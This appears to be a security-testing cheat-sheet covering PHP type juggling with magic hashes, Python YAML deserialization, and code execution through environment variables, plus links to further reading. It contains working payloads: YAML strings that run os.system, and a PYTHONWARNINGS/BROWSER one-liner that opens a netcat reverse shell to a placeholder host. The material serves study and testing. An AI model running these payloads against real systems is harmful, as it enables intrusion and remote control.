Application-related vulnerabilities
Table of Content
Source code analysis
General tools
- Sonarqube (static analyis)
PHP
Filters
Type juggling
PayloadAllTheThings - Juggling type and magic hashes.
First it is important to identify which version of PHP is running. Versions 5, 7 and 8 behave differently when it comes to loose comparaisons (operators
==and!=).php > var_dump("0e123456789012345678901234567890" == md5(240610708)); bool(true)
Hash function Value Hashed Value md5 240610708 0e462097431906509019562988736854 sha-224 10885164793773 0e281250946775200129471613219196999537878926740638594636 sha-256 34250003024812 0e46289032038065916139621039085883773413820991920706299695051332
$ rgi '[^=][!=]=[^=]' --glob '*.php'
Common functions
assert()
preg_match()
preg_replace()
Deserialization
Execution sinks
Python
Deserialization
pickle
yaml
General resources:
- OWASP Cheatsheet on deserialization with Python
YAML Deserialization Attack in Python (pdf).
Look for these strings to identify serialized data:
data base64 yaml: eWFtbDog !!python/ ISFweXRob24v Payloads:
import yaml sleep = b'!!python/object/apply:time.sleep [10]' system = b'!!python/object/apply:os.system ["id"]' yaml.load(payload, Loader=yaml.Loader)
Environment Variables
When running a Python script, the interpret will check if the PYTHONWARNINGS
environment variable is set (equivalent to the -W flag). This variable is of
the form action:message:category:module:line and the "category" field can be
used to import a Python module. There is a particular module, antigravity
which offers code execution as soon as it is imported. This comes from an Easter
egg where the import will launch a web browser and open the XKCD comic about
Python.
The web browser used comes from the webbrowser.py module. As can be seen around
line 552, the module will execute any command passed within the environment
variable BROWSER.
By setting the variables as follows, we can get arbitrary shell command execution:
PYTHONWARNINGS="all:0:antigravity.x:0:0" BROWSER="/bin/sh -c '/bin/nc -e /bin/sh <ip> <port>'" python3 <script.py>
Another option is to use /bin/bash as BROWSER and set the environment
variable BASH_ENV which will be evaluate when Bash runs.
Sources:
Node.js
SQL Injection with Express and MySQL
Authentication bypass can be achieved due to type confusion, as explained here.
Misc
ImageMagick
- Playing with ImageTragick like it's 2016: revisited attacks on ImageMagick by Synacktiv.
JSON
- An Exploration of JSON Interoperability Vulnerabilities: Detailed explanations about the common pitfalls that can arise when passing JSON data between applications (from Bishop Fox Labs).
